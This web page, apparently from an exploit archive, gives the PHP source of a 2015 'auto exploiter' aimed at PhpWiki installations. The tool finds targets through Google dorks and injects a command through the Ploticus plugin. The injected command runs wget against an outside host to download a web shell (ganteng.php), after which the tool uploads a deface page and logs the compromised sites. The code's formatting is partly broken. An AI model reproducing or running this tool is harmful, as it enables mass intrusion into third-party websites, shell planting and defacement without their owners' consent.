facebook facebook twitter rss

auto exploiter Phpwiki versi

Author: Tu5b0l3d , Published: 14-07-2015

<?php

/*
Tu5b0l3d
Thx to: IndoXploit, Hacker-Newbie.org
pepes.php = script deface
*/
class auto{
    private 
$url;
    private 
$dork
    private 
$log=null;
    function 
__construct($file=null){
        echo 
"/*Dorker, Uploader, auto defacer and Zone-H PhpWiki*/\n\n";
        echo 
"[+]Masukkan Dork: ";
        
$fp fopen("php://stdin""rb");
        
$dork fgets($fp);
        
$dork str_replace(array("\n""\r""\r\n"), ""$dork);
        echo 
"[+]Masukkan jumlah situs yg discan: ";
        
$total fgets($fp);
        
$total str_replace(array("\n""\r""\r\n"), ""$total);
        
fclose($fp);
        
$this->dork $dork;
        
$this->total $total;
        
$this->log $file;
        
$this->scan();
    }
    function 
match($start$end$var){
        return 
preg_match_all("{".preg_quote($start).'(.*?)'.preg_quote($end)."}is"$var$m) ? $m[1] : null;
    }
    function 
curl($dork=null$x$url=null){
        
$ch curl_init();
        if(
$dork != null && is_numeric($x)){
            
curl_setopt($chCURLOPT_URL"http://www.google.com/custom?q=".urlencode($dork)."&btnG=Search&start=".urlencode($x));
        }elseif(
$url != null && $x==null){
            
curl_setopt($chCURLOPT_URL$url);
        }
        
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
        
curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue);
        
curl_setopt($chCURLOPT_AUTOREFERERtrue );
        
curl_setopt($chCURLOPT_FAILONERRORtrue);
        
$exec curl_exec($ch);
        
curl_close($ch);
        return 
$exec;
    }
    function 
save($url){
        if(
$this->log != null){
            
$fp = @fopen($this->log"a") or die("cant open file");
            
fwrite($fp$url);
            
fclose($fp);
        }else return 
false;
    }
    function 
parse($urls){
        for(
$a=0$a<count($urls); $a++){
            
$dev parse_url($urls[$a]);
            @
$scheme[] = $dev['scheme'];
            @
$host[] = $dev['host'];
        }
        
$unik array_unique($host);
        foreach(
$unik as $key=>$url){
            
$urls_[] = $scheme[$key]."://".$url;
        }
        return 
$urls_;
    }
    function 
waktu($start){
        
$end time() - $start;
        
$detik round($end);
        echo 
"\n~selesai dalam {$detik} detik\n";
    }
    function 
scan(){
        
$start=0;
        
$total=0;
        
$mulai time();
        do{
            
$i=0;
            
$data $this->curl($this->dork$start);
            
$urls $this->match('<a class="l" href="''" onmousedown="'$data);
            if(
$urls==null){
                echo 
"~hasil tidak ada\n";
                
$this->waktu($mulai);
                exit;
            }
            function 
wkwk($urls,$data){
 
$ch curl_init($urls);
 
curl_setopt($chCURLOPT_POSTtrue);
 
curl_setopt($chCURLOPT_POSTFIELDS,$data);
 
curl_setopt($chCURLOPT_RETURNTRANSFER1);
 
$postResult curl_exec($ch);
 
curl_close($ch);
 return 
$postResult;

function 
ambilKata($param$kata1$kata2){
    if(
strpos($param$kata1) === FALSE) return FALSE;
    if(
strpos($param$kata2) === FALSE) return FALSE;
    
$start strpos($param$kata1) + strlen($kata1);
    
$end strpos($param$kata2$start);
    
$return substr($param$start$end $start);
    return 
$return;
}
            
$urls_ $this->parse($urls);
            
$count count($urls_);
            if(
$count==0){
                echo 
"hasil tidak ada atau ada halangan captcha :p\n~keluar";
                
$this->waktu($mulai);
                exit;
            }
            
            do{
                
$enter "\n";
                
$urlq $urls_[$i];
                    echo 
$urlq;
                    echo 
"\n";
                    echo 
" -> wait...";
                    echo 
"\n";
                    
                
                
$cmd2 "wget http://comedyingeneral.com/scripts/ganteng.txt -O ganteng.php";
    
$cmd str_replace(" ","+",$cmd);
    
$test wkwk($urlq."/phpwiki5/index.php/HeIp","pagename=HeIp&edit%5Bcontent%5D=%3C%3CPloticus+device%3D%22%3Becho+sohai%27%3A%3A%3A%27+1%3E%262%3B$cmd2+1%3E%262%3Becho+%27%3A%3A%3A%27sohai+1%3E%262%3B%22+-prefab%3D+-csmap%3D+data%3D+alt%3D+help%3D+%3E%3E&edit%5Bpreview%5D=Preview&action=edit");
    if(
preg_match('/sohai:::/',$test)){
       
$hasil ambilKata($test,"sohai:::",":::sohai");
       echo 
$hasil;
       echo 
"\n";
       echo 
"\n";
       echo 
"-> Deface: ";
           
$uploadfile3="pepes.php";
                        
$ch3 curl_init("$urlq/phpwiki5/ganteng.php");
                        
curl_setopt($ch3CURLOPT_POSTtrue);
                        
curl_setopt($ch3CURLOPT_POSTFIELDS,
                        array(
'file3'=>"@$uploadfile3"));
                        
curl_setopt($ch3CURLOPT_RETURNTRANSFER1);
                        
$postResult3 curl_exec($ch3);
                        
curl_close($ch3);
                        
                    
$admin7 $this->curl(nullnull$urlq."/k.php");
                        if(
preg_match('#Hacked#is'$admin7)){
                        
$dir1 "/k.php\n\n";
                        
$this->save($urlq.'/'.$dir1." ");
                        echo 
$urlq."/k.php";
                        echo 
"\n";
                        echo 
"-> shell: ";
                        echo 
$urlq."/phpwiki5/ganteng.php";
                        echo 
"\n"
                        echo 
"\n"
                        }
                        else {
                        echo 
"-> Site tidak terdeface";
                        echo 
"\n";
                        echo 
"\n";
                        }
    }else{
       echo 
'-> Not Vulenarble';
      echo 
"\n";
      echo 
"\n";
    }
                        
                        
                
$total++;
                
$i++;
            }while(
$i<$count && $total<$this->total);
            
$start=$start+10;
        }while(
$total<$this->total);
        
$this->waktu($mulai);
        
    }

}

$gay = new auto("wiki_vuln.txt");
?>

Like us on Facebook :